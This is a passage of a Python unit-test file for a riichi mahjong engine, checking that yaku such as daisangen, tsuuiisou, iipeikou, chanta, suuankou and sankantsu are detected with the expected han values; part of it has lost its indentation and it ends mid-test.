yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.daisangen(), True)
self.assertEqual(yaku_types.total_yaku, ['daisangen'])
self.assertEqual(yaku_types.total_han, [13])
def test_no_tsuuiisou(self): # 字一色
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 2
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.SHAA.value)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.tsuuiisou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_tsuuiisou(self): # 字一色
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.TON.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 2
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.SHAA.value)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.tsuuiisou(), True)
self.assertEqual(yaku_types.total_yaku, ['tsuuiisou'])
self.assertEqual(yaku_types.total_han, [13])
def test_no_daisuushii(self): # 大四喜
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
naki_tile = Tile(Suit.JIHAI.value, Jihai.PEI.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.DAMINKAN, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.PEI.value)
for i in range(1, 5)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.SHAA.value)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.daisuushii(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_daisuushii(self): # 大四喜
self.player.hand[Tile(Suit.JIHAI.value, Jihai.TON.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
naki_tile = Tile(Suit.JIHAI.value, Jihai.PEI.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.DAMINKAN, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.PEI.value)
for i in range(1, 5)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.SHAA.value)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.daisuushii(), True)
self.assertEqual(yaku_types.total_yaku, ['daisuushii'])
self.assertEqual(yaku_types.total_han, [13])
def test_shousuushii(self): # 小四喜
self.player.hand[Tile(Suit.JIHAI.value, Jihai.TON.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.SHAA.value).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 3
naki_tile = Tile(Suit.JIHAI.value, Jihai.PEI.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.DAMINKAN, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.PEI.value)
for i in range(1, 5)]))
self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.SHAA.value)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.shousuushii(), True)
self.assertEqual(yaku_types.total_yaku, ['shousuushii'])
self.assertEqual(yaku_types.total_han, [13])
def test_no_shousangen(self): # 小三元
self.player.hand[Tile(Suit.JIHAI.value, Jihai.PEI.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 3
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 6)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.shousangen(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_shousangen(self): # 小三元
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HAKU.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.HATSU.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 3
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 6)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.shousangen(), True)
self.assertEqual(yaku_types.total_yaku, ['shousangen'])
self.assertEqual(yaku_types.total_han, [2])
def test_yakuhai(self): # 役牌
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 2
self.player.hand[Tile(Suit.JIHAI.value, Jihai.TON.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 6).index] += 2
self.player.hand[Tile(Suit.MANZU.value, 8).index] += 3
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 6)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Yakuhai(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.yakuhai(), True)
self.assertEqual(yaku_types.total_yaku,
['sangenpai_CHUN', 'bakaze_TON', 'jikaze_TON'])
self.assertEqual(yaku_types.total_han, [1, 1, 1])
class TestPeikou(unittest.TestCase):
def setUp(self):
self.player = Player('test', 0)
self.stack = Stack()
self.bakaze = Jihai.TON
def test_no_ryanpeikou(self): # 二盃口
for i in range(1, 4):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 2
for i in range(4, 7):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
naki_tile = Tile(Suit.MANZU.value, 5)
naki_tile.owner = 0
self.player.kabe.append(
Huro(Naki.CHII, naki_tile,
[Tile(Suit.MANZU.value, i) for i in range(4, 7)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Peikou(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.ryanpeikou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_ryanpeikou(self): # 二盃口
for i in range(1, 7):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 2
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Peikou(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.ryanpeikou(), True)
self.assertEqual(yaku_types.total_yaku, ['ryanpeikou'])
self.assertEqual(yaku_types.total_han, [3])
def test_no_iipeikou(self): # 一盃口
for i in range(1, 7):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
naki_tile = Tile(Suit.MANZU.value, 5)
naki_tile.owner = 0
self.player.kabe.append(
Huro(Naki.CHII, naki_tile,
[Tile(Suit.MANZU.value, i) for i in range(4, 7)]))
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Peikou(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.iipeikou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_iipeikou(self): # 一盃口
for i in range(1, 4):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 2
for i in range(4, 7):
self.player.hand[Tile(Suit.MANZU.value, i).index] += 1
self.player.hand[Tile(Suit.JIHAI.value, Jihai.NAN.value).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Peikou(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.iipeikou(), True)
self.assertEqual(yaku_types.total_yaku, ['iipeikou'])
self.assertEqual(yaku_types.total_han, [1])
class TestChanta(unittest.TestCase):
def setUp(self):
self.player = Player('test', 0)
self.stack = Stack()
self.bakaze = Jihai.TON
def test_no_chinroutou(self): # 清老頭
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 1).index] += 1
naki_tile = Tile(Suit.SOUZU.value, 9)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.SOUZU.value, 9) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 1)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chinroutou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_chinroutou(self): # 清老頭
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 1).index] += 1
naki_tile = Tile(Suit.SOUZU.value, 9)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.SOUZU.value, 9) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 1)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chinroutou(), True)
self.assertEqual(yaku_types.total_yaku, ['chinroutou'])
self.assertEqual(yaku_types.total_han, [13])
def test_no_honroutou(self): # 混老頭
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 1).index] += 1
naki_tile = Tile(Suit.SOUZU.value, 9)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.SOUZU.value, 9) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 1)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.honroutou(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_honroutou(self): # 混老頭
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 1).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 1).index] += 1
naki_tile = Tile(Suit.SOUZU.value, 9)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.SOUZU.value, 9) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 1)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.honroutou(), True)
self.assertEqual(yaku_types.total_yaku, ['honroutou'])
self.assertEqual(yaku_types.total_han, [2])
def test_no_junchantaiyaochuu(self): # 純全帯么九
self.player.hand[Tile(Suit.MANZU.value, 4).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
naki_tile = Tile(Suit.SOUZU.value, 9)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.SOUZU.value, 9) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.junchantaiyaochuu(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_junchantaiyaochuu_opened(self): # 純全帯么九
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
naki_tile = Tile(Suit.SOUZU.value, 9)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.SOUZU.value, 9) for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.junchantaiyaochuu(), True)
self.assertEqual(yaku_types.total_yaku, ['junchantaiyaochuu'])
self.assertEqual(yaku_types.total_han, [2])
def test_junchantaiyaochuu_closed(self): # 純全帯么九
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.SOUZU.value, 9).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.junchantaiyaochuu(), True)
self.assertEqual(yaku_types.total_yaku, ['junchantaiyaochuu'])
self.assertEqual(yaku_types.total_han, [3])
def test_no_chanta(self): # 混全帯么九
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 5).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 9).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chanta(), False)
self.assertEqual(yaku_types.total_yaku, [])
self.assertEqual(yaku_types.total_han, [])
def test_chanta_opened(self): # 混全帯么九
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
naki_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
naki_tile.owner = 2
self.player.kabe.append(
Huro(Naki.PON, naki_tile,
[Tile(Suit.JIHAI.value, Jihai.CHUN.value)
for i in range(1, 4)]))
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
self.player.menzenchin = False
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chanta(), True)
self.assertEqual(yaku_types.total_yaku, ['chanta'])
self.assertEqual(yaku_types.total_han, [1])
def test_chanta_closed(self): # 混全帯么九
self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 2).index] += 3
self.player.hand[Tile(Suit.MANZU.value, 3).index] += 3
self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 3
self.player.hand[Tile(Suit.PINZU.value, 9).index] += 1
self.player.agari_tile = Tile(Suit.PINZU.value, 9)
machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
yaku_types = Chanta(
self.player, self.stack, machi_tiles, self.bakaze, True)
self.assertEqual(yaku_types.chanta(), True)
self.assertEqual(yaku_types.total_yaku, ['chanta'])
self.assertEqual(yaku_types.total_han, [2])

class TestKoutsu(unittest.TestCase):
    def setUp(self):
        self.player = Player('test', 0)
        self.stack = Stack()
        self.bakaze = Jihai.TON

    def test_no_suuankou(self):  # 四暗刻
        self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
        self.player.hand[Tile(Suit.PINZU.value, 3).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 4).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 5).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 9).index] += 2
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 2
        self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Koutsu(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.suuankou(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_no_suuankou_ron(self):  # 四暗刻
        self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
        self.player.hand[Tile(Suit.PINZU.value, 3).index] += 3
        self.player.hand[Tile(Suit.MANZU.value, 4).index] += 2
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 2
        self.player.agari_tile = Tile(Suit.MANZU.value, 4)
        ron = True
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Koutsu(
            self.player, self.stack, machi_tiles, self.bakaze, ron)
        self.assertEqual(yaku_types.suuankou(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_suuankou_tanki(self):  # 四暗刻単騎
        self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
        self.player.hand[Tile(Suit.PINZU.value, 3).index] += 3
        self.player.hand[Tile(Suit.MANZU.value, 4).index] += 3
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 1
        self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Koutsu(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.suuankou(), True)
        self.assertEqual(yaku_types.total_yaku, ['suuankou tanki'])
        self.assertEqual(yaku_types.total_han, [26])

    def test_suuankou(self):  # 四暗刻
        self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
        self.player.hand[Tile(Suit.PINZU.value, 3).index] += 3
        self.player.hand[Tile(Suit.MANZU.value, 4).index] += 2
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 2
        self.player.agari_tile = Tile(Suit.MANZU.value, 4)
        ron = False  # 自摸
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Koutsu(
            self.player, self.stack, machi_tiles, self.bakaze, ron)
        self.assertEqual(yaku_types.suuankou(), True)
        self.assertEqual(yaku_types.total_yaku, ['suuankou'])
        self.assertEqual(yaku_types.total_han, [13])

    def test_no_suukantsu(self):  # 四槓子
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 2).index] += 3
        naki_tile = Tile(Suit.MANZU.value, 2)
        naki_tile.owner = 2
        self.player.kabe.append(
            Huro(Naki.DAMINKAN, naki_tile,
                 [Tile(Suit.MANZU.value, 2) for i in range(1, 5)]))
        naki_tile = Tile(Suit.MANZU.value, 3)
        naki_tile.owner = 0
        self.player.kabe.append(
            Huro(Naki.ANKAN, naki_tile,
                 [Tile(Suit.MANZU.value, 3) for i in range(1, 5)]))
        naki_tile = Tile(Suit.MANZU.value, 7)
        naki_tile.owner = 0
        self.player.kabe.append(
            Huro(Naki.CHAKAN, naki_tile,
                 [Tile(Suit.MANZU.value, 7) for i in range(1, 5)]))
        self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
        self.player.menzenchin = False
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Koutsu(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.suukantsu(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_suukantsu(self):  # 四槓子
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
        naki_tile = Tile(Suit.MANZU.value, 2)
        naki_tile.owner = 2
        self.player.kabe.append(
            Huro(Naki.DAMINKAN, naki_tile,
                 [Tile(Suit.MANZU.value, 2) for i in range(1, 5)]))
        naki_tile = Tile(Suit.MANZU.value, 3)
        naki_tile.owner = 0
        self.player.kabe.append(
            Huro(Naki.ANKAN, naki_tile,
                 [Tile(Suit.MANZU.value, 3) for i in range(1, 5)]))
        naki_tile = Tile(Suit.MANZU.value, 7)
        naki_tile.owner = 0
        self.player.kabe.append(
            Huro(Naki.CHAKAN, naki_tile,
                 [Tile(Suit.MANZU.value, 7) for i in range(1, 5)]))
        naki_tile = Tile(Suit.PINZU.value, 7)
        naki_tile.owner = 3
        self.player.kabe.append(
            Huro(Naki.DAMINKAN, naki_tile,
                 [Tile(Suit.PINZU.value, 7) for i in range(1, 5)]))
        self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
        self.player.menzenchin = False
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Koutsu(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.suukantsu(), True)
        self.assertEqual(yaku_types.total_yaku, ['suukantsu'])
        self.assertEqual(yaku_types.total_han, [13])

    def test_no_sanankou(self):  # 三暗刻
        self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
        self.player.hand[Tile(Suit.MANZU.value, 4).index] += 2
        self.player.hand[Tile(Suit.MANZU.value, 5).index] += 2
        self.player.hand[Tile(Suit.MANZU.value, 6).index] += 2
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 1
        self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Koutsu(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.sanankou(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_no_sanankou_ron(self):  # 三暗刻
        self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
        self.player.hand[Tile(Suit.MANZU.value, 2).index] += 2
        self.player.hand[Tile(Suit.MANZU.value, 5).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 6).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 7).index] += 1
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
        self.player.hand[Tile(Suit.PINZU.value, 4).index] += 2
        self.player.agari_tile = Tile(Suit.PINZU.value, 4)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Koutsu(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.sanankou(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_sanankou(self):  # 三暗刻
        self.player.hand[Tile(Suit.MANZU.value, 1).index] += 3
        self.player.hand[Tile(Suit.SOUZU.value, 2).index] += 3
        self.player.hand[Tile(Suit.PINZU.value, 3).index] += 3
        self.player.hand[Tile(Suit.MANZU.value, 4).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 5).index] += 1
        self.player.hand[Tile(Suit.MANZU.value, 6).index] += 1
        self.player.hand[Tile(Suit.JIHAI.value, Jihai.CHUN.value).index] += 1
        self.player.agari_tile = Tile(Suit.JIHAI.value, Jihai.CHUN.value)
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Koutsu(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.sanankou(), True)
        self.assertEqual(yaku_types.total_yaku, ['sanankou'])
        self.assertEqual(yaku_types.total_han, [2])

    def test_no_sankantsu(self):  # 三槓子
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 2).index] += 3
        naki_tile = Tile(Suit.MANZU.value, 2)
        naki_tile.owner = 2
        self.player.kabe.append(
            Huro(Naki.DAMINKAN, naki_tile,
                 [Tile(Suit.MANZU.value, 2) for i in range(1, 5)]))
        naki_tile = Tile(Suit.MANZU.value, 3)
        naki_tile.owner = 0
        self.player.kabe.append(
            Huro(Naki.ANKAN, naki_tile,
                 [Tile(Suit.MANZU.value, 3) for i in range(1, 5)]))
        naki_tile = Tile(Suit.MANZU.value, 7)
        naki_tile.owner = 3
        self.player.kabe.append(
            Huro(Naki.PON, naki_tile,
                 [Tile(Suit.MANZU.value, 7) for i in range(1, 4)]))
        self.player.agari_tile = Tile(Suit.SOUZU.value, 5)
        self.player.menzenchin = False
        machi_tiles = check_tenpai(self.player.hand, self.player.kabe)
        yaku_types = Koutsu(
            self.player, self.stack, machi_tiles, self.bakaze, True)
        self.assertEqual(yaku_types.sankantsu(), False)
        self.assertEqual(yaku_types.total_yaku, [])
        self.assertEqual(yaku_types.total_han, [])

    def test_sankantsu(self):  # 三槓子
        self.player.hand[Tile(Suit.SOUZU.value, 5).index] += 1
        self.player.hand[Tile(Suit.PINZU.value, 2).index] += 3
        naki_tile = Tile(Suit.MANZU.value, 2)
        naki_tile.owner = 2
        self.player.kabe.append(
            Huro(Naki.DAMINKAN, naki_tile,
                 [Tile(Suit.MANZU.value, 2) for i in range(1, 5)]))
        naki_tile = Tile(Suit.MANZU.value, 3)
        naki_tile.owner = 0
        self.player.kabe.append(
            Huro(Naki.ANKAN, naki_tile,
                 [Tile(Suit.MANZU.value, 3) for i in range(1, 5)]))
        naki_tile = Tile(Suit.MANZU.value, 7)
        naki_tile.owner = 0
        self.player.kabe.append(
            Huro(Naki.CHAKAN, naki_tile,
                 [Tile(Suit.MANZU.value, 7) for i in range(1, 5)]))
